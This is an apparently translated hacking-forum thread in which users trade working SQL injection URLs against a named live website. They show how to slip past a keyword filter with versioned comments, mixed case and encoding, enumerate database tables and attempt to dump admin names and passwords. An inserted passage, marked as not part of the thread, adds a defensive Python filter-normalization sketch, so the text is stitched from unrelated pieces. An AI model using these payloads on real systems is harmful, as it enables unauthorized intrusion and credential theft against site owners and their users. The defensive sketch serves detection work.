Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. shuba

    Here it is online: http://fiascowines.ca/images/gallery/scan.php?
     
  2. Electr0n

    Is this parameter being filtered? What can it be replaced with?
    Code:
    group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
     
    #14442 Electr0n, 11 Aug 2010
    Last edited: 11 Aug 2010
  3. Konqi

    Tell me what exactly is being filtered.
     
    _________________________
  4. Electr0n

    Konqi, I can't figure out what exactly. How do I check?
     
    #14444 Electr0n, 11 Aug 2010
    Last edited by a moderator: 11 Aug 2010
  5. shuba

    So what exactly is being filtered for you??? Maybe there's no access to the schema?
     
    1 person likes this.
  6. Konqi

    Test different words:

    union, select, group_concat, table_name, etc.

    error - not filtered
    forbidden - filtered

    if this is mod_security, of course
     
    _________________________
    1 person likes this.
  7. Electr0n

    Konqi, written like this it gets through: /*!UnIoN+SeLeCt*/ and there is no error...
    How do I filter the other queries?
     
  8. h00lyshit!

    https://forum.antichat.ru/showpost.php?p=2289579&postcount=14624
     
    1 person likes this.
  9. Konqi

    Bypass it the same way as union select

    https://forum.antichat.ru/threadnav46016-1343-10.html
     
    _________________________
    #14449 Konqi, 11 Aug 2010
    Last edited: 11 Aug 2010
    1 person likes this.
  10. Electr0n

    Please take a look at the filter; I tried, but couldn't get the tables to display...
    Code:
    http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
     
    #14450 Electr0n, 11 Aug 2010
    Last edited: 11 Aug 2010
  11. Konqi

    http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,table_name,3,4,5,6,7+from+information_schema.%60tables%60--
     
    _________________________
  12. Electr0n

    Suppose... I want to list all the tables with my query group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema= so what do I do about the filter here?
    An example right away, if possible...
     
  13. Konqi

    http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT%28TabLe_naMe%29,3,4,5,6,7+from+information_schema.%60tables%60--
     
    _________________________
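Seen from the defending side, the posts above describe a keyword filter that matches raw request text and is passed by MySQL versioned comments, mixed case, URL-encoding and backtick quoting. The following is an added example, not part of the thread: a Python sketch that normalizes a parameter value before matching, run on constructed values. `normalize`, `naive_match` and `normalized_match` are hypothetical names, and the literal rule in `naive_match` is an assumption about how such a filter behaves.

```python
import re
from urllib.parse import unquote_plus

# Tokens a SQL injection rule looks for once the input is in canonical form.
SQL_TOKENS = re.compile(
    r"\b(union\s+select|group_concat\s*\(|concat\s*\(|information_schema\s*\.\s*tables)"
)
# MySQL executes the body of /*! ... */ (optionally /*!50000 ... */) as SQL.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Constructed parameter values (not taken from any real log).
SAMPLES = {
    "benign": "14",
    "plain": "-5+union+select+1,2,3--",
    "versioned": "-5+/*!UnIoN+SeLeCt*/+1,2,3--",
    "encoded": "-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT%28TabLe_naMe%29,3"
               "+from+information_schema.%60tables%60--",
}


def normalize(raw_value: str) -> str:
    """Canonicalize a query-string value the way the database will read it."""
    text = unquote_plus(raw_value)               # %28 -> (, %60 -> `, + -> space
    text = VERSIONED_COMMENT.sub(r" \1 ", text)  # keep the executable comment body
    text = PLAIN_COMMENT.sub(" ", text)          # ordinary comments act as whitespace
    text = text.replace("`", "")                 # identifier quoting splits names
    return re.sub(r"\s+", " ", text).lower().strip()


def naive_match(raw_value: str) -> bool:
    """Assumed weak rule: literal, case-sensitive match on the raw value."""
    literals = ("union+select", "union select", "information_schema.tables")
    return any(lit in raw_value for lit in literals)


def normalized_match(raw_value: str) -> list:
    """Return the SQL tokens found after normalization (empty list = clean)."""
    return [m.group(1) for m in SQL_TOKENS.finditer(normalize(raw_value))]


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:10} naive={naive_match(value)!s:5} "
              f"normalized={normalized_match(value)}")
```

The same normalization order matters in a real rule set: decoding and comment unwrapping have to happen before the case-insensitive match, otherwise the rule compares against text the database never sees.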
  14. Electr0n

    Please correct what's wrong.. it doesn't output the data
    Code:
    http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,cOnCaT(name,0x3a,password),3,4,5,6,7+from+0x61646d696e--
     
    #14454 Electr0n, 11 Aug 2010
    Last edited: 11 Aug 2010
  15. Seravin

    The table name is in a hash? :confused:
     
    #14455 Seravin, 11 Aug 2010
    Last edited: 11 Aug 2010
  16. Electr0n

    Seravin, yes, as you can see...
     
  17. Seravin

    Maybe it would be better to read at least one manual first before asking?
     
  18. Electr0n

    Seravin, can you help, or can you only send people to the manuals?
     
  19. Konqi

    You can't do it that way.

    2 seravin: that's not a hash, that's hex
     
    _________________________
  20. Seravin

    2Konqi well, that's true too) hex) but people need to be sent to read the manuals first, otherwise they won't learn a damn thing if you guide them onto the right path.
    P.S. Get on ICQ or come out of invisible mode
     
    #14460 Seravin, 11 Aug 2010
    Last edited: 11 Aug 2010